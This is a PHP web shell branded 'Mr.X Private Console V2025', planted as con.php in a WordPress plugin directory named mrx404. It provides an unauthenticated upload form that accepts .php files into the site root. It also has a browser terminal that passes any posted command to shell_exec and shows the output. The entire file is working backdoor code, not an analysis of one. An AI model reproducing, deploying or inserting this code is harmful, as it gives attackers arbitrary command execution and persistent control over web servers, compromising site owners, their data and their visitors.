File: /home/computingcore/public_html/wp-content/plugins/mrx404/con.php
<?php
if (!defined('ABSPATH')) {
define('ABSPATH', dirname(__FILE__) . '/');
}
// Secure File Upload Handling
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
$allowed_extensions = ['php', 'txt', 'zip', 'jpg', 'png', 'html']; // Allowed file types
$file_ext = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION);
if (!in_array(strtolower($file_ext), $allowed_extensions)) {
echo "<script>alert('Error: File type not allowed!');</script>";
} else {
$target_file = ABSPATH . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) {
echo "<script>alert('File uploaded: " . htmlspecialchars($_FILES['file']['name']) . "');</script>";
} else {
echo "<script>alert('Upload failed.');</script>";
}
}
}
// Command Execution
if (isset($_POST['command'])) {
$cmd = trim($_POST['command']);
$output = shell_exec($cmd . ' 2>&1');
die(nl2br(htmlspecialchars($output)));
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Mr.X Console</title>
<style>
body {
font-family: 'Courier New', monospace;
background-color: #111;
color: #0f0;
text-align: center;
}
.banner {
color: #ff0;
font-size: 18px;
font-weight: bold;
padding: 10px;
background: #222;
border: 2px solid #ff0;
display: inline-block;
}
.console {
background: #000;
padding: 10px;
border-radius: 5px;
text-align: left;
height: 350px;
overflow-y: auto;
border: 1px solid #444;
width: 90%;
margin: auto;
}
input, button {
padding: 8px;
font-size: 16px;
}
input {
width: 70%;
background: #222;
color: #fff;
border: 1px solid #555;
}
button {
background: #444;
color: #fff;
border: none;
cursor: pointer;
}
button:hover {
background: #666;
}
.file-upload {
margin-bottom: 10px;
}
pre {
font-size: 14px;
text-align: left;
}
</style>
</head>
<body>
<!-- BANNER -->
<div class="banner">
<pre>
███╗ ███╗██████╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ ███████╗
████╗ ████║██╔══██╗ ╚██╗██╔╝ ╚════██╗██╔═████╗╚════██╗██╔════╝
██╔████╔██║██████╔╝ ╚███╔╝ █████╔╝██║██╔██║ █████╔╝███████╗
██║╚██╔╝██║██╔══██╗ ██╔██╗ ██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║
██║ ╚═╝ ██║██║ ██║██╗██╔╝ ██╗ ███████╗╚██████╔╝███████╗███████║
╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝
Mr.X Private Console V2025 | telegram: @jackleet
</pre>
</div>
<!-- FILE UPLOAD -->
<form action="" method="post" enctype="multipart/form-data" class="file-upload">
<input type="file" name="file">
<button type="submit">Upload</button>
</form>
<!-- SHOW FILE PATH -->
<p><b>Current Path:</b> <?php echo ABSPATH; ?></p>
<!-- LIVE TERMINAL -->
<div class="console" id="consoleOutput">[+] Console Ready</div>
<br>
<input type="text" id="commandInput" placeholder="Enter command...">
<button onclick="runCommand()">Run</button>
<script>
function runCommand() {
let command = document.getElementById("commandInput").value;
if (command.trim() === "") return;
let xhr = new XMLHttpRequest();
xhr.open("POST", "", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function () {
if (xhr.readyState === 4 && xhr.status === 200) {
let outputDiv = document.getElementById("consoleOutput");
outputDiv.innerHTML += "<br><b>$ " + command + "</b><br>" + xhr.responseText;
outputDiv.scrollTop = outputDiv.scrollHeight;
}
};
xhr.send("command=" + encodeURIComponent(command));
}
</script>
</body>
</html>